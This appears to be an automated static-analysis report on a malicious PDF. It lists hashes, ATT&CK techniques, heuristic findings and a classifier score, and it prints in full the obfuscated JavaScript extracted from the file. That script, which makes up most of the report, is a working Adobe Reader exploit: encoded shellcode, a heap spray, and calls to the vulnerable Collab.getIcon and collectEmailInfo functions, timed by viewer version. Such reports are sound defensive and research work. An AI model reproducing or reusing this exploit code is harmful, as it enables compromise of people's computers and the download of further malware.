Malicious PDF — malware analysis report

Static analysis result for SHA-256 07a1bc1851c8a782…

MALICIOUS

PDF

182.7 KB Created: 2009-06-26 16:25:57 +08:00 Authoring application: Acrobat PDFMaker 7.0 for Word (via Acrobat Distiller 7.0 (Windows)) First seen: 2026-05-09
MD5: b2157f975ae5fbc26a2d97b2af94dc08 SHA-1: 6f708f8b1e714465a62c001bd228105dc5bcfd41 SHA-256: 07a1bc1851c8a782bbffad06dc0bc6244b669fad8088d4ce1beb802a2d925ed9
108 Risk Score

Malware Insights

MITRE ATT&CK
T1059.007 JavaScript T1203 Exploitation for Client Execution

The PDF contains obfuscated JavaScript that attempts a heap spray and decodes shellcode. This shellcode is likely intended to download and execute a second-stage payload, a common technique for initial compromise. The ML classifier strongly indicates maliciousness, and the presence of obfuscated JavaScript points to a deliberate exploit.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9995

Heuristics 4

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Obfuscated multi-stage PDF JavaScript heap-spray exploit critical CVE related PDF_JS_OBFUSCATED_MULTISTAGE_HEAPSPRAY
    PDF JavaScript hidden behind nested stream filters and/or a custom in-JS decoder (rolling-XOR stager) decodes to a heap-spray / ROP chain. The spray is only visible after unwinding those layers, which is why the raw heap-spray rules miss it. This is an obfuscated multi-stage Adobe Reader JavaScript exploit; the dropped Windows payload (often named Win.Trojan.Agent by signature AV) is the second stage, not the delivery mechanism.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In PDF document text
    • http://ns.adobe.com/pdf/1.3/In PDF document text
    • http://ns.adobe.com/pdfx/1.3/In PDF document text
    • http://ns.adobe.com/xap/1.0/In PDF document text
    • http://ns.adobe.com/xap/1.0/mm/In PDF document text
    • http://purl.org/dc/elements/1.1/In PDF document text
    • http://ns.adobe.com/photoshop/1.0/In PDF document text

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0048_000.js pdf-javascript-stream PDF /JS object 48 at offset 0x50B 4618 bytes
SHA-256: 52238c55fc1642aae97770d6c1e5beaef5cb30c11490197f67c5669134f9bc84
Preview script
First 1,000 lines of the extracted script
var sc
for(i=0;i<18000;i++)
sc=sc+0x60
var unes=unescape//sjg'hs';[
var strTempA="\x62\x79\x74e\x54\x6f\x43\x68\x61\x72";
var strTempB="g\x65t\x49"//sgj;sdg
strTempB+="\x63\x6f\x6e";
var strTempC="c\x6fll\x65\x63\x74"//gfjl;hgs'lmh
strTempC+="\x45\x6d\x61\x69lInfo";

function rep(count,what){
          var v = "";
          while (--count >= 0) v += what;
          return v;
}
function myunes(buf) {
          var ret=""
          for (var x=0;x < buf["\x6c\x65\x6e\x67\x74\x68"]; x+=2) {
                  ret = ret+util[strTempA](Number('\x30x'+buf["\x73\x75\x62\x73\x74\x72"](x,2)));//
          }
          return ret;
}
sc=unes("\x25\x75\x34\x334\x31\x25\x75\x34b\x349\x25\x7511EB\x25\x755BFC\x25\x75334B\x25\x7566C9\x25\x75b0B9\x25\x758001\x25\x750B34\x25\x75E2f9"+
"\x25\x75EBFA\x25\x75E805\x25\x75FFEB\x25\x75FFFF\x25\x75F911\x25\x75F9F9\x25\x75A3F9\x25\x7572AC\x25\x757815\x25\x759D15\x25\x75F9FD\x25\x7572F9"+
"\x25\x75110D\x25\x75F869\x25\x75F9F9\x25\x750172\x25\x751611\x25\x75F9F9\x25\x7570F9\x25\x7506FF"+
"\x25\x7591CF\x25\x756254\x25\x752684\x25\x75ED11\x25\x75F9F8\x25\x7570F9\x25\x75F5BF\x25\x75CF06"+
"\x25\x75D091\x25\x753FEB\x25\x7511AF\x25\x75F8FC\x25\x75F9F9\x25\x75BF70\x25\x7506E9\x25\x7591CF"+
"%uC5A0%u82FE%u0F11\x25\x75F9F9%u70F9%uEDBF%uCF06%u8791"+
"%u1B21%u118A%uF91E\x25\x75F9F9%uBF70%uCACD%u1230%u72FA"+
"%uC5B7%u387A%uA8FD\x25\x75F993%u06A8%uF5AF%u7AA0%u0601"+
"%u098D%uB9C4%uF9E6%u8FF9%u7010%uC5B7\x25\x75F993%uF993"+
"\x25\x75F993%uFB93%uF993%u8F06%u06C5%uE9AF%uBF70%u7ABD"+
"%uF901%u328D\x25\x75F993%uF993%uF993%uFD93%u8F06%u06BD"+
"%uEDAF%uBF70%u7AB1\x25\x75F901%u4C8D%uC178%uA9DC%uBFBD"+
"%uB772%u8CC5%u7854\x25\x75F941%uF9EB%uA9F9%uA99D%u8CBD"+
"%u7858%uFD41\x25\x75F9EB%u16F9%u1307%u8C57%u406C%uFFF9"+
"%uF9F9%u1578%uF1F9\x25\x75F9F9%uAEAF%u0972%u3F78%uEBE9"+
"\x25\x75F9F9%u3D72%u397A%u72F1%u0A01%u405D%uFFF9%uF9F9"+
"%uB0B0\x25\x75B0B0%uCD78%u17F1%u0707%u7C16%u8C30%uA608"+
"%u06A7%uC58F%u8F06\x25\x7506B1%uBD8F%u1906%uAFAC%u589D"+
"%uF9C9\x25\x75F9F9%u397C%uEA81%u72C7%uF5B9%u72C7%uE589"+
"%u72C7\x25\x75F1A7%uC754%u9172%u12F1%uC7F4%uB972%uC7CD"+
"%u5172%uF941\x25\x75F9F9%u22CA%u3C72%uA4A7%uFD3B%uAAF9"+
"%uAFAC\x25\x75CFAE%u9572%uE1DD%u72CF%uC5BC%u72CF%uFCAD"+
"%uFA81\x25\x75C72C%uB372%uC7E1%uA372%uFAD9%u1A24%uB0C5"+
"%u72C7%u72CD\x25\x750CFA%u06CA%uCA05%u5539%u3DC3%uFE8D"+
"%u3638\x25\x75FAF4%u1201%uCF0B%u85C2%uEDDD%u268C%u3B72"+
"\x25\x75397A%uC7DD%uE172%u24FA%uC79F%uF572%uC7B2%uA372"+
"\x25\x75FAE5\x25\x75C724\x25\x75FD72\x25\x75FA72\x25\x75123C\x25\x75CAFB\x25\x757239\x25\x75A62C"+
"%uA4A7%u3BA2\x25\x75F9F1%uF911%uF9F9%uA1F9%u397A%u3AFC");
strTempD="\x73etTimeOu\x74"
function exp() {


blah = rep(128, unes("%u4242%u4242%u4242%u4242%u4242")) + sc;
bbk = unes("%u4242%u4242");
wap = 20+blah["l\x65\x6e\x67\x74\x68"]
while (bbk["l\x65\x6e\x67\x74\x68"]<wap) bbk+=bbk;
fillbk = bbk["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, wap);
bk = bbk["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, bbk["l\x65\x6e\x67\x74\x68"]-wap);
while(bk["l\x65\x6e\x67\x74\x68"]+wap<262144) bk = bk+bk+fillbk;
mm = new Array()//afha][]ajf
for (i=0;i<350;i++) mm[i] = bk + blah;
of = rep(4096, myunes("\x30a\x30a\x30a\x30a"));
var a=["\x5f\x4e\x2e\x62\x75\x6e\x64\x6c\x65"];//next time
Collab[strTempB](of+a[0x0]);
}
var jkdhg=app

var sghfjs=Array
function start() 
{
if (jkdhg.viewerVersion >= 7.0)
{
plin =rep(1124,unes("\x25\x750b0b\x25\x750028\x25\x7506eb\x25\x7506eb")) + unes("\x25\x750b0b\x25\x750028\x25\x750aeb\x25\x750aeb") + unes("\x25\x754346\x25\x754a4b") + rep(122,unes("\x25\x750b0b\x25\x750028\x25\x7506eb\x25\x7506eb")) + sc  + rep(1256,unes("\x25\x754a4b\x25\x754748"));
} 
else 
{
blah = rep(128, unes("\x25\x754242\x25\x754242\x25\x754242\x25\x754242\x25\x754242")) +""+ sc
bbk = unes("\x25\x754242\x25\x754242");
wap = 20+blah["l\x65\x6e\x67\x74\x68"]
while (bbk["l\x65\x6e\x67\x74\x68"]<wap) bbk+=bbk;
fillbk = bbk["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, wap);
bk = bbk["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, bbk["l\x65\x6e\x67\x74\x68"]-wap);
while(bk["l\x65\x6e\x67\x74\x68"]+wap<262144) bk = bk+bk+fillbk;
mm = new sghfjs()//ahplgha[
for (i=0;i<250;i++) mm[i] = bk + blah;
plin = rep(8000, unes("\x25\x75\x30a\x30a\x25\x75\x30a\x30a"));

}
if (jkdhg["\x76\x69\x65\x77\x65\x72\x56\x65\x72\x73\x69\x6F\x6E"] >= 6.0)//gakghfvlgfal
{
 Collab[strTempC]({subj:0,msg:plin});
}
}

if(jkdhg["\x76\x69\x65\x77\x65\x72\x56\x65\x72\x73\x69\x6F\x6E"] >= 8.0)
{
          var shaft = jkdhg[strTempD]("exp()",12);
}
else{
var shaft = jkdhg[strTempD]("start()",1200);
}

Open this report in the interactive analyzer, or submit your own file for analysis.